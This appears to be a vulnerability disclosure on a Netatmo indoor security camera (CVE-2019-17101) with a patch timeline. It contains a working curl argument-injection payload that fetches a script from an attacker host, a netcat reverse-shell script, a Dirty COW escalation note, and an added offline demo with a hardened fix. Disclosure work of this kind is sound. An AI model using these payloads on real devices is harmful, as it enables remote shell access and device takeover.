
Cracking the Netatmo Smart Indoor Security Camera

Bogdan BOTEZATU

April 23, 2020


CVE-2019-17101 – Command execution due to unsanitized input

Indoor video surveillance has become one of the most frequent applications for IoT devices. In public places, offices or private homes, video surveillance helps deter crime and detect accidents before they become uncontainable. Security cameras have become a necessity but, in the IoT world, any new gadget added to a network can turn into a liability.

This article – part of a series developed in partnership with PCMag – aims to shed light on the security of the world’s best-sellers in the IoT space. PCMag contacted the research team at Bitdefender and asked us to look at several popular devices, including the Netatmo Smart Indoor Security Camera. More information is available in this article published on our partner’s website.

Vulnerabilities at a glance

The Bitdefender IoT Vulnerability Research Team discovered that the device is susceptible to an authenticated file write that leads to command execution (CVE-2019-17101), as well as to privilege escalation via dirtyc0w (Dirty COW, CVE-2016-5195), a local privilege-escalation bug that exploits a race condition in the copy-on-write implementation of the Linux kernel's memory-management subsystem.

These might not be the droids you’re looking for

While our past research showed real-life examples where attackers could remotely hijack devices and control them from afar, this report is a tad different – the vulnerabilities outlined here may help a legitimate user or a third party in possession of the correct credentials to jailbreak the device and completely own it. And, while we’ll let you imagine a valid real-world scenario in which you’d pwn your own device, we’d also like to remind keen visitors to our blog that the ability to jailbreak is still a vulnerability and should be regarded as such.

Disclosure timeline

Dec 20, 2019: Bitdefender informs the vendor about the vulnerability
Dec 23, 2019: Vulnerability acknowledged on the vendor's side
Jan 14, 2020: Vulnerability is fixed, patch expected to deploy on Jan 20
Jan 17, 2020: Patch is adopted among affected customers
Apr 23, 2020: Coordinated vulnerability disclosure

Authenticated file write leading to command execution

The webserver running on the camera is vulnerable to a file write that can be leveraged to obtain command execution with the privileges of the running server. To reach the vulnerable endpoint, an attacker on the local network needs to know the camera's secret path; a remote attacker needs access to the owner's user account (obtained through credential stuffing, phishing, etc.) and can then send commands over the VPN connection.

The vulnerability occurs in the dtg_get_config.sh script because the user-controlled variable $mac_address is expanded unquoted on a command line.

Vulnerable line:

evt_config_json=`curl -X GET http://127.0.0.1:8083/configs/home/modules/id=$mac_address`

An attacker can use the shell's expansion and word splitting to pass arbitrary extra arguments to the curl command through the $mac_address variable.

Example payload:

mac_address={,-o,/dev/null,192.168.50.131/rev.sh,-o,/system/www/secret/live/ping.sh}

Using this payload, the executed command will be:

curl -X GET http://127.0.0.1:8083/configs/home/modules/id= -o /dev/null 192.168.50.131/rev.sh -o /system/www/secret/live/ping.sh

curl pairs -o options with URLs in the order given, so it first fetches the local config endpoint and discards the response into /dev/null, then fetches a second URL from a host we control (192.168.50.131/rev.sh in this case; with no scheme given, curl defaults to http://) and writes it as /system/www/secret/live/ping.sh, inside the directory the webserver serves.

To execute the dropped script, one then requests it through the webserver at /b3f2f2101057f1f956776c1431113a01/live/ping.sh

Example shell script for reverse shell:

#!/system/bin/sh
# connect back to the attacker's listener; -e attaches /bin/sh to the socket
busybox nc 192.168.50.131 4446 -e /bin/sh

This script runs with the privileges of the webserver, uid 1000 and gid 3003 (on Android-based firmware, which the /system/bin/sh path suggests, these are the system user and the inet group).

Note: several other reachable scripts also leave input variables unquoted when they are interpreted by sh, so the same pattern applies beyond dtg_get_config.sh.
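The defect above, reproduced as an added example that is not code from the camera's firmware or from Bitdefender's write-up. It substitutes a shell function for curl so that it runs offline and only shows what argv the command would receive, uses a constructed whitespace-separated payload to trigger word splitting directly, and puts the vulnerable call next to a hardened one that validates the value as a MAC address and quotes the expansion. The attacker host, the paths and the MAC address are made-up values.

```shell
#!/bin/sh
# Added example, not code from the Netatmo firmware or from the Bitdefender
# write-up. It reproduces the defect class behind CVE-2019-17101 (an unquoted
# variable expansion inside a command line) against a stand-in curl so it
# runs offline, then shows a hardened version of the same call.

# Stand-in for curl: prints each argument it receives on its own line, so we
# can see exactly how many words the shell handed to the command. (Assumption
# for this example: argv is all we care about, no network access is made.)
curl() {
  printf '%s\n' "$@"
}

# Vulnerable form, mirroring the line in dtg_get_config.sh: $mac_address is
# expanded unquoted, so the shell splits it on IFS and every piece becomes a
# separate argument to curl.
vulnerable_fetch() {
  mac_address=$1
  curl -X GET http://127.0.0.1:8083/configs/home/modules/id=$mac_address
}

# Accept only the one shape a MAC address can have: six hex octets separated
# by colons. A case pattern must match the whole string, so an embedded
# newline or space cannot smuggle a second "line" past the check the way a
# line-oriented grep could.
is_mac() {
  hex='[0-9A-Fa-f][0-9A-Fa-f]'
  case $1 in
    $hex:$hex:$hex:$hex:$hex:$hex) return 0 ;;
    *) return 1 ;;
  esac
}

# Hardened form. Two independent fixes, either of which defeats the payload:
#  1. reject anything that is not a MAC address before it reaches a command;
#  2. double-quote the expansion so it is always exactly one argument.
hardened_fetch() {
  mac_address=$1
  if ! is_mac "$mac_address"; then
    echo "rejected: '$mac_address' is not a MAC address" >&2
    return 1
  fi
  curl -X GET "http://127.0.0.1:8083/configs/home/modules/id=$mac_address"
}

# Helpers for inspecting a call: how many arguments did curl get, and did
# "-o" arrive as an argument of its own (the primitive the article abuses to
# turn a config lookup into a file write)?
argc_of() {
  "$@" | wc -l | tr -d ' '
}
got_output_flag() {
  "$@" | grep -qx -- '-o'
}

# Constructed payload in the spirit of the article's: whitespace separates
# the injected words; the host and paths are made-up values.
PAYLOAD='x -o /dev/null 192.168.50.131/rev.sh -o /system/www/secret/live/ping.sh'

echo "vulnerable call: curl received $(argc_of vulnerable_fetch "$PAYLOAD") arguments"          # 8
echo "hardened call, same payload: curl received $(argc_of hardened_fetch "$PAYLOAD") arguments" # 0 (rejected)
echo "hardened call, valid MAC: curl received $(argc_of hardened_fetch 00:11:22:33:44:55) arguments" # 3
```

Quoting alone stops argument injection, since the whole value becomes a single argv entry no matter what it contains. The allow-list check is still worth keeping: with quoting only, the value can still steer the request path on the internal 127.0.0.1:8083 service (for instance with slashes or a query string), and rejecting anything that is not a MAC address up front removes that surface as well.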

Privilege escalation

The device is susceptible to privilege escalation (an attacker can get root access) via the dirtyc0w exploit.

This vulnerability was discovered independently by both Bitdefender and Netatmo's security team, and has been fixed. According to Netatmo, all indoor camera models have received the update that closes the dirtyc0w bug since the end of February 2020.
